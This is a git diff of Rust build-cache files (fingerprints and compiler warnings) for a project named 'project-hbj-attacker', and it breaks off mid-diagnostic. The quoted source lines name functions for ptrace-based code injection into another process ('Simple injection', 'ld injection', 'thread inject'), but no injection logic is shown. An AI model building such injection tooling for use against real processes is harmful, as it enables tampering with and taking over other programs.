+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":3316208278650011218,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,3813136525644006961]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-0dae6fb844b6e156/dep-test-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/bin-project-hbj-attacker
new file mode 100644
index 0000000..eb4f3fb
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/bin-project-hbj-attacker
@@ -0,0 +1 @@
+5a19ac64579eb87e
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..2149efa
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":8731458305071235362,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,16851255346335658477],[5150833351789356492,"nix",false,1524876878938899937],[7883780462905440460,"libloading",false,11840416865595721862],[11499138078358568213,"libc",false,6911773660789407732],[14034831750265444586,"ctor",false,13205310156866713074],[17285295483919976612,"dynasmrt",false,16634940951051159224]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..6138aad
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..58193b3
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-115c34231582b5ff/output-bin-project-hbj-attacker
@@ -0,0 +1,6 @@
+{"$message_type":"diagnostic","message":"value assigned to `dlopen_offset` is never read","code":{"code":"unused_assignments","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":1889,"byte_end":1902,"line_start":57,"line_end":57,"column_start":13,"column_end":26,"is_primary":true,"text":[{"text":" let mut dlopen_offset: u64 = 0;","highlight_start":13,"highlight_end":26}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"maybe it is overwritten before being read?","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"`#[warn(unused_assignments)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: value assigned to `dlopen_offset` is never read\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:57:13\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m57\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let mut dlopen_offset: u64 = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: maybe it is overwritten before being read?\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_assignments)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `seg_rw`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":4330,"byte_end":4336,"line_start":112,"line_end":112,"column_start":22,"column_end":28,"is_primary":true,"text":[{"text":"fn inject3(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // thread inject","highlight_start":22,"highlight_end":28}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/main.rs","byte_start":4330,"byte_end":4336,"line_start":112,"line_end":112,"column_start":22,"column_end":28,"is_primary":true,"text":[{"text":"fn inject3(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // thread inject","highlight_start":22,"highlight_end":28}],"label":null,"suggested_replacement":"_seg_rw","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `seg_rw`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:112:22\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m112\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn inject3(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // thread inject\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_seg_rw`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `inject1` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":434,"byte_end":441,"line_start":23,"line_end":23,"column_start":4,"column_end":11,"is_primary":true,"text":[{"text":"fn inject1(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // Simple injection","highlight_start":4,"highlight_end":11}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(dead_code)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `inject1` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:23:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m23\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn inject1(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // Simple injection\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(dead_code)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `inject2` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":1333,"byte_end":1340,"line_start":48,"line_end":48,"column_start":4,"column_end":11,"is_primary":true,"text":[{"text":"fn inject2(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // ld injection","highlight_start":4,"highlight_end":11}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `inject2` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:48:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m48\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn inject2(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // ld injection\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `module_base_address` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/map.rs","byte_start":1290,"byte_end":1309,"line_start":49,"line_end":49,"column_start":8,"column_end":27,"is_primary":true,"text":[{"text":"pub fn module_base_address(range_strings: &Vec<&str>, module_name: &str) -> Option {","highlight_start":8,"highlight_end":27}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `module_base_address` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/map.rs:49:8\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m49\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub fn module_base_address(range_strings: &Vec<&str>, module_name: &str) -> Option {\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"5 warnings emitted","code":null,"level":"warning","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: 5 warnings emitted\u001b[0m\n\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/bin-project-hbj-attacker
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..6d08b39
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":17672942494452627365,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,17829934850101662729],[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..7ceaaf6
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..7b9e836
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-138dced13c0ab27a/output-bin-project-hbj-attacker
@@ -0,0 +1,6 @@
+{"$message_type":"diagnostic","message":"unresolved import `iced_x86::code_asm`","code":{"code":"E0432","explanation":"An import was unresolved.\n\nErroneous code example:\n\n```compile_fail,E0432\nuse something::Foo; // error: unresolved import `something::Foo`.\n```\n\nIn Rust 2015, paths in `use` statements are relative to the crate root. To\nimport items relative to the current and parent modules, use the `self::` and\n`super::` prefixes, respectively.\n\nIn Rust 2018 or later, paths in `use` statements are relative to the current\nmodule unless they begin with the name of a crate or a literal `crate::`, in\nwhich case they start from the crate root. As in Rust 2015 code, the `self::`\nand `super::` prefixes refer to the current and parent modules respectively.\n\nAlso verify that you didn't misspell the import name and that the import exists\nin the module from where you tried to import it. Example:\n\n```\nuse self::something::Foo; // Ok.\n\nmod something {\n pub struct Foo;\n}\n# fn main() {}\n```\n\nIf you tried to use a module from an external crate and are using Rust 2015,\nyou may have missed the `extern crate` declaration (which is usually placed in\nthe crate root):\n\n```edition2015\nextern crate core; // Required to use the `core` crate in Rust 2015.\n\nuse core::any;\n# fn main() {}\n```\n\nSince Rust 2018 the `extern crate` declaration is not required and\nyou can instead just `use` it:\n\n```edition2018\nuse core::any; // No extern crate required in Rust 2018.\n# fn main() {}\n```\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":150,"byte_end":158,"line_start":10,"line_end":10,"column_start":16,"column_end":24,"is_primary":true,"text":[{"text":"use iced_x86::{code_asm::*, Instruction};","highlight_start":16,"highlight_end":24}],"label":"could not find `code_asm` in `iced_x86`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0432]\u001b[0m\u001b[0m\u001b[1m: unresolved import `iced_x86::code_asm`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:10:16\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m10\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse iced_x86::{code_asm::*, Instruction};\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mcould not find `code_asm` in `iced_x86`\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused import: `processes::write_memory_vm`","code":{"code":"unused_imports","explanation":null},"level":"warning","spans":[{"file_name":"src/helper.rs","byte_start":138,"byte_end":164,"line_start":7,"line_end":7,"column_start":9,"column_end":35,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":9,"highlight_end":35}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_imports)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"remove the whole `use` item","code":null,"level":"help","spans":[{"file_name":"src/helper.rs","byte_start":130,"byte_end":166,"line_start":7,"line_end":8,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":1,"highlight_end":36},{"text":"pub use processes::write_memory_ptrace;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused import: `processes::write_memory_vm`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper.rs:7:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m7\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub use processes::write_memory_vm;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_imports)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused import: `Instruction`","code":{"code":"unused_imports","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":163,"byte_end":174,"line_start":10,"line_end":10,"column_start":29,"column_end":40,"is_primary":true,"text":[{"text":"use iced_x86::{code_asm::*, Instruction};","highlight_start":29,"highlight_end":40}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"remove the unused import","code":null,"level":"help","spans":[{"file_name":"src/main.rs","byte_start":161,"byte_end":174,"line_start":10,"line_end":10,"column_start":27,"column_end":40,"is_primary":true,"text":[{"text":"use iced_x86::{code_asm::*, Instruction};","highlight_start":27,"highlight_end":40}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null},{"file_name":"src/main.rs","byte_start":149,"byte_end":150,"line_start":10,"line_end":10,"column_start":15,"column_end":16,"is_primary":true,"text":[{"text":"use iced_x86::{code_asm::*, Instruction};","highlight_start":15,"highlight_end":16}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null},{"file_name":"src/main.rs","byte_start":174,"byte_end":175,"line_start":10,"line_end":10,"column_start":40,"column_end":41,"is_primary":true,"text":[{"text":"use iced_x86::{code_asm::*, Instruction};","highlight_start":40,"highlight_end":41}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused import: `Instruction`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:10:29\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m10\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse iced_x86::{code_asm::*, Instruction};\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:43:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m43\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"aborting due to 1 previous error; 3 warnings emitted","code":null,"level":"error","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror\u001b[0m\u001b[0m\u001b[1m: aborting due to 1 previous error; 3 warnings emitted\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"For more information about this error, try `rustc --explain E0432`.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mFor more information about this error, try `rustc --explain E0432`.\u001b[0m\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/bin-project-hbj-attacker
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..3b07104
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":17672942494452627365,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,664901908625290867]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..5c54f74
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..993ed40
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-16fc8141eb52a768/output-bin-project-hbj-attacker
@@ -0,0 +1,5 @@
+{"$message_type":"diagnostic","message":"unresolved import `nix::sys::ptrace`","code":{"code":"E0432","explanation":"An import was unresolved.\n\nErroneous code example:\n\n```compile_fail,E0432\nuse something::Foo; // error: unresolved import `something::Foo`.\n```\n\nIn Rust 2015, paths in `use` statements are relative to the crate root. To\nimport items relative to the current and parent modules, use the `self::` and\n`super::` prefixes, respectively.\n\nIn Rust 2018 or later, paths in `use` statements are relative to the current\nmodule unless they begin with the name of a crate or a literal `crate::`, in\nwhich case they start from the crate root. As in Rust 2015 code, the `self::`\nand `super::` prefixes refer to the current and parent modules respectively.\n\nAlso verify that you didn't misspell the import name and that the import exists\nin the module from where you tried to import it. Example:\n\n```\nuse self::something::Foo; // Ok.\n\nmod something {\n pub struct Foo;\n}\n# fn main() {}\n```\n\nIf you tried to use a module from an external crate and are using Rust 2015,\nyou may have missed the `extern crate` declaration (which is usually placed in\nthe crate root):\n\n```edition2015\nextern crate core; // Required to use the `core` crate in Rust 2015.\n\nuse core::any;\n# fn main() {}\n```\n\nSince Rust 2018 the `extern crate` declaration is not required and\nyou can instead just `use` it:\n\n```edition2018\nuse core::any; // No extern crate required in Rust 2018.\n# fn main() {}\n```\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":5,"byte_end":21,"line_start":2,"line_end":2,"column_start":5,"column_end":21,"is_primary":true,"text":[{"text":"use nix::sys::ptrace;","highlight_start":5,"highlight_end":21}],"label":"no `ptrace` in `sys`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"found an item that was configured out","code":null,"level":"note","spans":[{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":1306,"byte_end":1324,"line_start":79,"line_end":79,"column_start":8,"column_end":26,"is_primary":false,"text":[{"text":" #![feature = \"ptrace\"]","highlight_start":8,"highlight_end":26}],"label":"the item is gated behind the `ptrace` 